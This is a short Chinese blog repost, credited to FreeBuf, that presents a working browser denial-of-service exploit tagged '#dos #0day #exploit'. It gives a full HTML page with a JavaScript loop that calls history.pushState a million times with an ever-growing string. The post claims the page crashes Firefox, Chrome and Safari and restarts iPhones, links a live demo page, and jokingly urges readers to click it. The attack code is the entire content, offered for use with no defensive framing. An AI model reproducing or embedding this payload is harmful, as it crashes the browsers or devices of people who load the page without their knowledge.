黑客代码HTML

Crash firefox, chrome, safari browsers, and also restart iPhone using this javascript code. #dos #0day #exploit
//使用下面这段JavaScript代码能让firefox,chrome,safari浏览器崩溃,而且还能让iPhone重启。


<html> <body> <script> var total=""; for (var i=0;i<1000000;i++) {     total= total+i.toString();     history.pushState(0,0,total); } </script> </body> </html>

www.0xroot.cn/demo.html (点击一下,又不会怀孕!)

转载来自FreeBuf黑客与极客(FreeBuf.COM)
原文地址:https://www.cnblogs.com/lanke0/p/5148253.html